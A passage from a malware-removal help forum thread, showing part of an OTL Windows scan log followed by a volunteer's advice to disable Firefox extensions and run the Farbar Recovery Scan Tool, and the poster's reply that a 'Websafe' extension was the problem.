[2014/04/19 17:05:21 | 000,957,290 | ---- | M] () (No name found) -- C:\Users\Janine.menage\AppData\Roaming\mozilla\firefox\profiles\7dphpj52.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
[2014/04/19 17:10:19 | 000,552,234 | ---- | M] () (No name found) -- C:\Users\Janine.menage\AppData\Roaming\mozilla\firefox\profiles\7dphpj52.default\extensions\{fe272bd1-5f76-4ea4-8501-a05d35d823fc}.xpi
[2014/03/30 15:41:54 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/03/30 15:42:07 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

O1 HOSTS File: ([2013/11/12 13:13:23 | 000,000,861 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 activation.acronis.com
O2:64bit: - BHO: (Lync Browser Helper) - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation)
O2:64bit: - BHO: (McAfee SiteAdvisor BHO) - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll (McAfee, Inc.)
O2:64bit: - BHO: (Microsoft SkyDrive Pro Browser Helper) - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL (Microsoft Corporation)
O2 - BHO: (McAfee SiteAdvisor BHO) - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
O3:64bit: - HKLM\..\Toolbar: (McAfee SiteAdvisor Toolbar) - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll (McAfee, Inc.)
O3 - HKLM\..\Toolbar: (McAfee SiteAdvisor Toolbar) - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
O4:64bit: - HKLM..\Run: [Acronis Scheduler2 Service] C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe (Acronis)
O4:64bit: - HKLM..\Run: [BTMTrayAgent] C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll (Motorola Solutions, Inc.)
O4:64bit: - HKLM..\Run: [CsrAudioguiCtrl] C:\Program Files\CSR\CSR Harmony Wireless Software Stack\CsrAudioguiCtrl.exe (Cambridge Silicon Radio Limited)
O4:64bit: - HKLM..\Run: [CSRHarmonySkypePlugin] C:\Program Files (x86)\CSR\CSR Harmony Wireless Software Stack\CSRHarmonySkypePlugin.exe (Cambridge Silicon Radio Limited)
O4:64bit: - HKLM..\Run: [CsrHCRPServer] C:\Program Files\CSR\CSR Harmony Wireless Software Stack\CsrHCRPServer.exe (Cambridge Silicon Radio Limited)
O4:64bit: - HKLM..\Run: [CsrSyncMLServer] C:\Program Files\CSR\CSR Harmony Wireless Software Stack\CsrSyncMLServer.exe ()
O4:64bit: - HKLM..\Run: [DptfPolicyLpmServiceHelper] C:\Windows\SysNative\DptfPolicyLpmServiceHelper.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [HarmonyUserStartup] C:\Program Files\CSR\CSR Harmony Wireless Software Stack\HarmonyUserStartup.exe (Cambridge Silicon Radio Limited)
O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\WINDOWS\SysNative\hkcmd.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IAStorIcon] C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIconLaunch.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IgfxTray] C:\WINDOWS\SysNative\igfxtray.exe (Intel Corporation)
O4:[b]64bit:
- HKLM..\Run: [NvBackend] C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe (NVIDIA Corporation)
O4:[b]64bit:
- HKLM..\Run: [Persistence] C:\WINDOWS\SysNative\igfxpers.exe (Intel Corporation)
O4:[b]64bit:
- HKLM..\Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor)
O4:[b]64bit:
- HKLM..\Run: [ShadowPlay] C:\WINDOWS\SysNative\nvspcap64.dll (NVIDIA Corporation)
O4:[b]64bit:
- HKLM..\Run: [TrayApplication] C:\Program Files\CSR\CSR Harmony Wireless Software Stack\TrayApplication.exe (Cambridge Silicon Radio Limited)
O4:[b]64bit:
- HKLM..\Run: [vksts] C:\Program Files\CSR\CSR Harmony Wireless Software Stack\vksts.exe (Cambridge Silicon Radio Limited)
O4 - HKLM..\Run: [] File not found
O4 - HKLM..\Run: [AcronisTibMounterMonitor] C:\Program Files (x86)\Common Files\Acronis\TibMounter\TibMounterMonitor.exe (Acronis International GmbH)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [ASUSPRP] C:\Program Files (x86)\ASUS\APRP\APRP.EXE (ASUSTek Computer Inc.)
O4 - HKLM..\Run: [ASUSWebStorage] C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\AsusWSPanel.exe (ASUS Cloud Corporation)
O4 - HKLM..\Run: [ATLauncher] "C:\Program Files\McAfeeEx\McAfeeAntiTheft\ATLauncher.exe" /createshortcuts:1 File not found
O4 - HKLM..\Run: [ATUninstallIcon] "C:\Program Files\McAfeeEx\McAfeeAntiTheft\ATLauncher.exe" /createuninstallentry:1 File not found
O4 - HKLM..\Run: [mcpltui_exe] C:\Program Files\McAfee.com\Agent\mcagent.exe (McAfee, Inc.)
O4 - HKLM..\Run: [SDTray] C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe (Safer-Networking Ltd.)
O4 - HKLM..\Run: [TrueImageMonitor.exe] C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe (Acronis)
O4 - HKU\S-1-5-21-2031378457-2822360979-1284179916-1002..\Run: [Power2GoExpress] NA File not found
O4 - HKU\S-1-5-21-2031378457-2822360979-1284179916-1002..\Run: [Spybot-S&D Cleaning] C:\Program Files (x86)\Spybot - Search & Destroy 2\SDCleaner.exe (Safer-Networking Ltd.)
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Main present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoControlPanel = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableCursorSuppression = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLinkedConnections = 1
O8:[b]64bit:
- Extra context menu item: &Envoyer à OneNote - res://C:\PROGRA~2\MICROS~1\Office15\ONBttnIE.dll/105 File not found
O8:[b]64bit:
- Extra context menu item: Add to Google Photos Screensa&ver - res://C:\WINDOWS\system32\GPhotos.scr/200 File not found
O8:[b]64bit:
- Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~2\MICROS~1\Office15\EXCEL.EXE/3000 File not found
O8:[b]64bit:
- Extra context menu item: SafeKey Fill Forms - file://C:\Users\Janine.menage\AppData\LocalLow\SafeKey\context.html?cmd=fillforms File not found
O8 - Extra context menu item: &Envoyer à OneNote - res://C:\PROGRA~2\MICROS~1\Office15\ONBttnIE.dll/105 File not found
O8 - Extra context menu item: Add to Google Photos Screensa&ver - C:\WINDOWS\SysWow64\GPhotos.scr (Google Inc.)
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~2\MICROS~1\Office15\EXCEL.EXE/3000 File not found
O8 - Extra context menu item: SafeKey Fill Forms - file://C:\Users\Janine.menage\AppData\LocalLow\SafeKey\context.html?cmd=fillforms File not found
O9:[b]64bit:
- Extra Button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\ONBttnIE.dll (Microsoft Corporation)
O9:[b]64bit:
- Extra 'Tools' menuitem : Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\ONBttnIE.dll (Microsoft Corporation)
O9:[b]64bit:
- Extra Button: Lync Click to Call - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation)
O9:[b]64bit:
- Extra 'Tools' menuitem : Lync Click to Call - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation)
O9:[b]64bit:
- Extra Button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9:[b]64bit:
- Extra 'Tools' menuitem : OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra Button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office 15\root\Office15\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office 15\root\Office15\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office 15\root\Office15\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office 15\root\Office15\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O13[b]64bit:
- gopher Prefix: missing
O13 - gopher Prefix: missing
O15 - HKU\S-1-5-21-2031378457-2822360979-1284179916-1002\..Trusted Domains: ma-config.com ([]http in Trusted sites)
O15 - HKU\S-1-5-21-2031378457-2822360979-1284179916-1002\..Trusted Domains: ma-config.com ([]https in Trusted sites)
O15 - HKU\S-1-5-21-2031378457-2822360979-1284179916-1002\..Trusted Domains: touslesdrivers.com ([]http in Trusted sites)
O16 - DPF: {0D41B8C5-2599-4893-8183-00195EC8D5F9} http://support.asus....k_sys_ctrl3.cab (asusTek_sysctrl Class)
O16 - DPF: {CF84DAC5-A4F5-419E-A0BA-C01FFD71112F} http://content.syste...el_4.5.15.0.cab (SysInfo Class)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 212.27.40.240 212.27.40.241
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{3CCBCC08-7F42-4241-B429-54DCB4DA2F3F}: DhcpNameServer = 192.168.0.254
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{7253EAB3-DC4D-48E3-A1FB-4D0C9DD6C543}: DhcpNameServer = 212.27.40.240 212.27.40.241
O18:[b]64bit:
- Protocol\Handler\dssrequest {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll (McAfee, Inc.)
O18:[b]64bit:
- Protocol\Handler\msdaipp - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\msdaipp\0x00000001 - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\msdaipp\oledb - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\osf - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\sacore {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll (McAfee, Inc.)
O18:[b]64bit:
- Protocol\Handler\skype4com - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\dssrequest {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\osf {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL (Microsoft Corporation)
O18 - Protocol\Handler\sacore {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18:[b]64bit:
- Protocol\Filter\application/x-mfe-ipt {3EF5086B-5478-4598-A054-786C45D75692} - c:\PROGRA~1\mcafee\msc\MCSNIE~1.DLL (McAfee, Inc.)
O18 - Protocol\Filter\application/x-mfe-ipt {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll (McAfee, Inc.)
O20:[b]64bit:
- AppInit_DLLs: (C:\Windows\system32\nvinitx.dll) - C:\Windows\SysNative\nvinitx.dll (NVIDIA Corporation)
O20:[b]64bit:
- AppInit_DLLs: (C:\WINDOWS\system32\nvinitx.dll) - C:\Windows\SysNative\nvinitx.dll (NVIDIA Corporation)
O20 - AppInit_DLLs: (c:\windows\syswow64\nvinit.dll) - c:\Windows\SysWOW64\nvinit.dll (NVIDIA Corporation)
O20:[b]64bit:
- HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20:[b]64bit:
- HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\WINDOWS\SysWow64\userinit.exe (Microsoft Corporation)
O20:[b]64bit:
- Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\WINDOWS\SysNative\igfxdev.dll (Intel Corporation)
O20 - Winlogon\Notify\SDWinLogon: DllName - (SDWinLogon.dll) - File not found
O21:[b]64bit:
- SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O30 - LSA: Security Packages - (livessp) - File not found
O32 - HKLM CDRom: AutoRun - 1
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:
- HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:
- HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:
- HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:
- HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

========== Files/Folders - Created Within 30 Days ==========

[2014/04/26 17:19:38 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Janine.menage\Desktop\OTL.exe
[2014/04/23 20:41:03 | 000,197,704 | ---- | C] (McAfee, Inc.) -- C:\WINDOWS\SysNative\drivers\HipShieldK.sys
[2014/03/31 19:25:04 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\DESIGNER
[2014/03/31 19:23:15 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
[2014/03/30 15:41:52 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2013/12/15 20:15:08 | 026,838,560 | ---- | C] (McAfee) -- C:\Program Files (x86)\Common Files\lpuninstall.exe
[1 C:\WINDOWS\SysNative\*.tmp files -> C:\WINDOWS\SysNative\*.tmp -> ]
[1 C:\Users\Janine.menage\AppData\Local\*.tmp files -> C:\Users\Janine.menage\AppData\Local\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2014/04/26 17:19:42 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Janine.menage\Desktop\OTL.exe
[2014/04/26 16:04:11 | 000,001,862 | ---- | M] () -- C:\Users\Public\Desktop\McAfee All Access – Total Protection.lnk
[2014/04/26 15:59:29 | 000,067,584 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2014/04/26 15:58:27 | 000,000,074 | ---- | M] () -- C:\Users\Janine.menage\AppData\Roaming\sp_data.sys
[2014/04/26 15:58:16 | 000,034,752 | ---- | M] () -- C:\WINDOWS\SysNative\drivers\WPRO_41_2001.sys
[2014/04/26 15:57:27 | 3338,059,776 | -HS- | M] () -- C:\hiberfil.sys
[2014/04/26 15:57:27 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys
[2014/04/21 00:19:09 | 000,007,616 | ---- | M] () -- C:\Users\Janine.menage\AppData\Local\resmon.resmoncfg
[2014/04/20 18:13:35 | 000,009,742 | ---- | M] () -- C:\Users\Janine.menage\Desktop\images.jpg
[2014/04/20 18:05:41 | 000,072,749 | ---- | M] () -- C:\Users\Janine.menage\Desktop\131.jpg
[2014/04/20 17:36:24 | 000,001,630 | ---- | M] () -- C:\Users\Janine.menage\Desktop\adwcleaner(1).exe - Raccourci.lnk
[2014/04/20 16:34:37 | 004,762,382 | ---- | M] () -- C:\Users\Janine.menage\Desktop\fiche-produit-terrasse-wex-2013.pdf
[2014/04/20 15:55:36 | 000,069,889 | ---- | M] () -- C:\Users\Janine.menage\Desktop\p4.jpg
[2014/04/09 18:30:30 | 001,827,432 | ---- | M] () -- C:\WINDOWS\SysNative\PerfStringBackup.INI
[2014/04/09 18:30:30 | 000,820,814 | ---- | M] () -- C:\WINDOWS\SysNative\perfh00C.dat
[2014/04/09 18:30:30 | 000,730,940 | ---- | M] () -- C:\WINDOWS\SysNative\perfh009.dat
[2014/04/09 18:30:30 | 000,162,892 | ---- | M] () -- C:\WINDOWS\SysNative\perfc00C.dat
[2014/04/09 18:30:30 | 000,139,072 | ---- | M] () -- C:\WINDOWS\SysNative\perfc009.dat
[2014/04/03 12:12:40 | 000,408,176 | ---- | M] () -- C:\WINDOWS\SysNative\FNTCACHE.DAT
[2014/03/30 18:55:39 | 000,062,464 | ---- | M] () -- C:\Users\Janine.menage\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[1 C:\WINDOWS\SysNative\*.tmp files -> C:\WINDOWS\SysNative\*.tmp -> ]
[1 C:\Users\Janine.menage\AppData\Local\*.tmp files -> C:\Users\Janine.menage\AppData\Local\*.tmp -> ]

========== Files Created - No Company Name ==========

[2014/04/20 19:29:07 | 000,007,616 | ---- | C] () -- C:\Users\Janine.menage\AppData\Local\resmon.resmoncfg
[2014/04/20 18:13:35 | 000,009,742 | ---- | C] () -- C:\Users\Janine.menage\Desktop\images.jpg
[2014/04/20 18:05:29 | 000,072,749 | ---- | C] () -- C:\Users\Janine.menage\Desktop\131.jpg
[2014/04/20 17:36:24 | 000,001,630 | ---- | C] () -- C:\Users\Janine.menage\Desktop\adwcleaner(1).exe - Raccourci.lnk
[2014/04/20 16:34:36 | 004,762,382 | ---- | C] () -- C:\Users\Janine.menage\Desktop\fiche-produit-terrasse-wex-2013.pdf
[2014/04/20 15:55:32 | 000,069,889 | ---- | C] () -- C:\Users\Janine.menage\Desktop\p4.jpg
[2014/03/19 10:34:08 | 000,103,936 | ---- | C] () -- C:\WINDOWS\SysWow64\OEMLicense.dll
[2014/03/12 21:07:07 | 000,000,290 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014/01/10 17:39:02 | 000,001,053 | ---- | C] () -- C:\WINDOWS\wininit.ini
[2014/01/06 18:43:47 | 000,267,387 | ---- | C] () -- C:\WINDOWS\hpoins19.dat.temp
[2014/01/06 18:43:46 | 000,015,561 | ---- | C] () -- C:\WINDOWS\hpomdl19.dat.temp
[2013/12/30 01:27:06 | 000,314,656 | ---- | C] () -- C:\WINDOWS\SysWow64\NvIFROpenGL.dll
[2013/12/30 00:28:19 | 001,874,686 | ---- | C] () -- C:\WINDOWS\SysWow64\PerfStringBackup.INI
[2013/12/29 21:34:12 | 000,000,000 | -H-- | C] () -- C:\ProgramData\DP45977C.lfl
[2013/10/06 18:14:53 | 000,037,038 | ---- | C] () -- C:\Users\Janine.menage\AppData\Roaming\Valeurs séparées par des virgules (DOS).ADR
[2013/10/06 18:12:09 | 000,037,152 | ---- | C] () -- C:\Users\Janine.menage\AppData\Roaming\Valeurs séparées par des virgules (Windows).ADR
[2013/10/01 13:02:30 | 000,303,104 | ---- | C] () -- C:\WINDOWS\SysWow64\igdmd32.dll
[2013/10/01 13:02:26 | 000,180,736 | ---- | C] () -- C:\WINDOWS\SysWow64\igdde32.dll
[2013/10/01 13:02:26 | 000,142,848 | ---- | C] () -- C:\WINDOWS\SysWow64\igdail32.dll
[2013/09/10 01:51:29 | 000,267,591 | ---- | C] () -- C:\WINDOWS\hpoins19.dat
[2013/09/10 01:51:29 | 000,015,561 | ---- | C] () -- C:\WINDOWS\hpomdl19.dat
[2013/08/22 17:36:43 | 000,215,943 | ---- | C] () -- C:\WINDOWS\SysWow64\dssec.dat
[2013/08/22 17:36:42 | 000,000,741 | ---- | C] () -- C:\WINDOWS\SysWow64\NOISE.DAT
[2013/08/22 16:46:23 | 000,067,584 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2013/08/22 09:01:23 | 000,043,131 | ---- | C] () -- C:\WINDOWS\mib.bin
[2013/08/22 05:32:36 | 000,046,080 | ---- | C] () -- C:\WINDOWS\SysWow64\BWContextHandler.dll
[2013/08/22 01:55:20 | 000,364,544 | ---- | C] () -- C:\WINDOWS\SysWow64\msjetoledb40.dll
[2013/08/22 01:52:39 | 000,673,088 | ---- | C] () -- C:\WINDOWS\SysWow64\mlang.dat
[2013/08/15 17:59:54 | 000,000,021 | ---- | C] () -- C:\Users\Janine.menage\AppData\Roaming\my_intel.sys
[2013/08/11 15:34:41 | 000,000,042 | ---- | C] () -- C:\Users\Janine.menage\intlname.ols
[2013/08/11 00:40:52 | 000,062,464 | ---- | C] () -- C:\Users\Janine.menage\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2013/08/07 18:06:58 | 000,112,640 | ---- | C] () -- C:\WINDOWS\SysWow64\ff_vfw.dll
[2013/08/06 19:33:15 | 000,000,382 | ---- | C] () -- C:\WINDOWS\ODBC.INI
[2013/08/06 17:04:36 | 000,000,074 | ---- | C] () -- C:\Users\Janine.menage\AppData\Roaming\sp_data.sys
[2013/06/10 04:30:58 | 000,004,362 | ---- | C] () -- C:\WINDOWS\SysWow64\DptfInvalidPolicyRemover.ini
[2013/04/26 01:15:21 | 000,024,576 | ---- | C] () -- C:\ProgramData\SetStretch.exe
[2013/04/26 01:15:21 | 000,000,256 | ---- | C] () -- C:\ProgramData\SetStretch.cmd
[2013/04/26 01:15:21 | 000,000,103 | ---- | C] () -- C:\ProgramData\SetStretch.VBS
[2013/02/13 13:27:54 | 000,001,536 | ---- | C] () -- C:\WINDOWS\SysWow64\IusEventLog.dll
[2012/07/25 22:22:56 | 000,267,284 | ---- | C] () -- C:\WINDOWS\SysWow64\igvpkrng600.bin
[2012/07/25 22:22:54 | 000,963,376 | ---- | C] () -- C:\WINDOWS\SysWow64\igcodeckrng600.bin

========== ZeroAccess Check ==========

[2014/03/12 21:12:13 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2013/12/09 10:05:24 | 021,199,256 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2013/12/09 06:51:04 | 018,643,560 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2013/08/22 11:49:49 | 000,921,088 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2013/08/22 04:45:10 | 000,691,712 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2013/08/22 11:45:17 | 000,483,840 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

========== LOP Check ==========

[2013/11/12 13:16:21 | 000,000,000 | ---D | M] -- C:\Users\Janine.menage\AppData\Roaming\Acronis
[2013/08/06 17:06:29 | 000,000,000 | ---D | M] -- C:\Users\Janine.menage\AppData\Roaming\ASUS WebStorage
[2013/08/21 16:54:07 | 000,000,000 | ---D | M] -- C:\Users\Janine.menage\AppData\Roaming\TuneUp Software
[2013/11/16 18:19:17 | 000,000,000 | ---D | M] -- C:\Users\Janine.menage\AppData\Roaming\WildTangent

========== Purity Check ==========



========== Alternate Data Streams ==========

@Alternate Data Stream - 127 bytes -> C:\ProgramData\Temp:D5FBE8F9

< End of report >

Edited by Essexboy, 26 April 2014 - 11:00 AM.

  • 0

Advertisements


#2
RKinner

RKinner

    Malware Expert

  • Expert
  • 20,009 posts
  • MVP

I can see something really strange in your Firefox extensions but I'm afraid it's so big the OTL will choke on it.

 

Go into Firefox Safe Mode:

 

https://support.mozi...using-safe-mode

 

Then disable all of the extensions.  Then close Firefox and reopen in regular mode.  Do you still see it? 

 

Run FRST:

 

Please download Farbar Recovery Scan Tool and save it to your Desktop. 
 
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version. 
 
  •  
  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer. 
  • Press Scan button. 
  • It will produce a log called FRST.txt in the same directory the tool is run from.  
  • Please copy and paste log back here. 
  • The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply. 

    • 0

    #3
    simbaman

    simbaman

      New Member

    • Topic Starter
    • Member
    • Pip
    • 2 posts

    Hi RKinner

     

    You are right, extension "Websafe" in Firefox was creating the trouble.

    All is fine now.

     

    Thanks a lot.

     

    Best regards


    • 0






    Similar Topics


    Also tagged with one or more of these keywords: pub hot deals, OTL report

    0 user(s) are reading this topic

    0 members, 0 guests, 0 anonymous users

    As Featured On:

    Microsoft Yahoo BBC MSN PC Magazine Washington Post HP